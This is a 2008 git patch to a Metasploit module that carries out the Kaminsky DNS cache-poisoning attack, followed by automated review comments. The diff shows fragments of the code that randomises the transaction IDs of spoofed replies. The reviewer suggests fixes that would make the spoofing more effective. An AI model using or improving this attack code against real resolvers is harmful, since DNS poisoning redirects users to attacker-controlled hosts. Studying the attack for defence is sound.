From e0bdbacb5d0055040052f68a795a3227b1f52c3f Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 23 Jul 2008 23:09:21 +0000
Subject: [PATCH] Better XID mixing

git-svn-id: file:///home/svn/framework3/trunk@5585 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/auxiliary/spoof/dns/bailiwicked_host.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb
index 5edf2016f1..182a734f9b 100644
--- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb
+++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb
@@ -11,7 +11,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'DNS BailiWicked Attack',
+ 'Name' => 'DNS BailiWicked Host Attack',
 'Description' => %q{
 This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single
@@ -132,6 +132,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 recons = datastore['RECONS']
 xids = datastore['XIDS'].to_i
 ttl = datastore['TTL'].to_i
+ xidbase = rand(4)+2*10000
 
 domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]
 
@@ -272,8 +273,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 req.qr = 1
 req.ra = 1
 
- p = rand(4)+2*10000
- p.upto(p+xids-1) do |id|
+ xidbase.upto(xidbase+xids-1) do |id|
 req.id = id
 barbs.each do |barb|
 buff = (
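Review bot: The added `xidbase = rand(4)+2*10000` in the second hunk parses as `rand(4) + 20000` because `*` binds tighter than `+`, so the base XID is one of only four adjacent values, 20000..20003, which is a very small amount of randomness for a value the rest of the module treats as its guess window. If four well-separated windows were intended the line should read `xidbase = (rand(4) + 2) * 10000`; if the narrow range is deliberate, it deserves a comment such as `# base XID: rand(4) + 20000, i.e. 20000..20003` so the precedence is not mistaken for a bug later. Nothing in either hunk bounds `xids` (read from datastore['XIDS'] two lines above) against the 16-bit DNS transaction-ID space, so `xidbase + xids - 1` overflows 65535 once XIDS exceeds 45533; a guard like `raise ArgumentError, "XIDS too large for the XID window" if xidbase + xids - 1 > 0xffff` next to the new line would catch that before `req.id` is assigned. The enclosing method starts and ends outside the hunk.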
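Review bot: In the third hunk the spoofed replies now always walk the single contiguous window `xidbase..xidbase+xids-1`, where the removed `p = rand(4)+2*10000` was re-evaluated each time that line ran; if this code sits inside a per-burst send loop (the loop boundaries are outside the hunk), every burst now targets the identical XID range for the whole run, which reads as less mixing, not more, despite the commit subject. That may be intentional, for example to keep the window aligned with whatever the earlier recon pass measured, but the reason should be recorded at the loop head, e.g. `# xidbase is fixed per run (set at the top of the method) so each burst covers the same XID window`. The method and the surrounding loop both continue outside the hunk.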